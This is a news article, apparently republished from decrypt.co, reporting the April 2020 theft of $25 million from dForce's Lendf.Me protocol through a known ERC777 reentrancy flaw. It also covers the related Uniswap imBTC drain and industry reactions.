en
Back to the list

Hackers just exploited a DeFi contract for $25 million

source-logo  decrypt.co 19 April 2020 08:23, UTC

dForce, a Chinese decentralized finance protocol, today lost $25 million worth of its customers’ cryptocurrency due to a well-known exploit of an Ethereum token. 

On Tuesday, dForce announced that it had secured $1.5 million in a seed round led by crypto VC fund Multicoin Capital.

The money was drained this morning from the contracts of Lendf.Me, a lending protocol that’s part of dForce, a collection of DeFi protocols. The site for Lendf.Me is now offline and its smart contracts have been paused. The funds were sent to DeFi lending protocols Compound and Aave. Stani Kulechov, founder and CEO of Aave, told Decrypt that around $10 million of the funds were sent to his protocol. 

The hack is linked to a well-known Ethereum exploit that was yesterday used to drain more than $300,000 from decentralized exchange Uniswap. Uniswap smart contracts containing imBTC—an Ethereum-based, tokenized version of Bitcoin that's run by TokenIon—were drained. Lendf.Me integrated imBTC in January. 

The smart contract for dForce was drained. (Source: DeFiPulse)

The Uniswap attack took advantage of a known vulnerability that concerns the ERC777 token standard. Due to the way Uniswap smart contracts are set up, a hacker could continually withdraw ERC777 funds from Uniswap before the balance updated, gradually draining the contracts of imBTC. The dForce hack is suspected to be the same. 

Both Tokenlon and Lendf.Me temporarily paused their smart contracts following the attacks. “We are working together with [Lendf.Me] to investigate it,” tweeted TokenIon. A spokesperson for dForce told Decrypt that they, too, are “still investigating.”

The vulnerability is not new. As described by DeFi Rate, the exploit is similar to the 2016 attack on The DAO. And ConsenSys, which backs an editorially independent Decrypt, called out the vulnerability in an extensive audit on Uniswap 16 months ago, concluding that it was a “major” issue. Uniswap will fix the vulnerability in an upgrade scheduled for this month.

Robert Leshner, the CEO of Compound, claims that Lendf.Me had appropriated its code, which was open-source. A report from The Block in January found that the term “Compound” appeared four times in dForce's contract. “If a project doesn't have the expertise to develop its own smart contracts, and instead steals and redeploys somebody else's copyrighted code, it's a sign that they don't have the capacity or intention to consider security,” tweeted Leshner.

4. Trusting platforms with obvious red flags like code appropriation is a bad bad idea.

— kain.eth (@kaiynne) April 19, 2020

So far, dForce has not discussed the exploit on their social media channels, “which is really frustrating,” one user, David Liu, who claims he lost $100,000, told Decrypt. dForce has not responded to further questions. 

Following February’s exploits on bZx, in which $1 million was stolen, investors might think twice before surrendering their money to smart contracts. For now, much of the money rests in Aave. Returning the money to its rightful owners is “difficult,” he said, “because we are DeFi.”

decrypt.co